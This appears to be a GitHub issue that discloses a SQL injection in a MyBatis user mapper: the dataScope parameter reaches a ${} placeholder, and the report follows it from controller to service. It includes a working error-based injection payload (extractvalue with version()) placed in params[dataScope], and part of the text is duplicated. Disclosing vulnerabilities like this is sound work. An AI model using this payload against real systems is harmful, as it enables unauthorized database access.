You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
There is a ${} in this mapper
Search selectUserList to see where the this select id is used:
UserController.java
Query user information:
Follow up the selectUserList method to see the specific implementation:
UserServiceImpl.java
The parameters in the User are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated
Verification:
Splice URL and parameters according to code:
params[dataScope]=
Use error injection to query the database version:
src/main/resources/mybatis/system/UserMapper.xml
There is a ${} in this mapper
Search selectUserList to see where the this select id is used:
UserController.java
Query user information:
Follow up the selectUserList method to see the specific implementation:
UserServiceImpl.java
The parameters in the User are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated
Verification:
Splice URL and parameters according to code:
Use error injection to query the database version:
params[dataScope]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))Select database name:
The text was updated successfully, but these errors were encountered: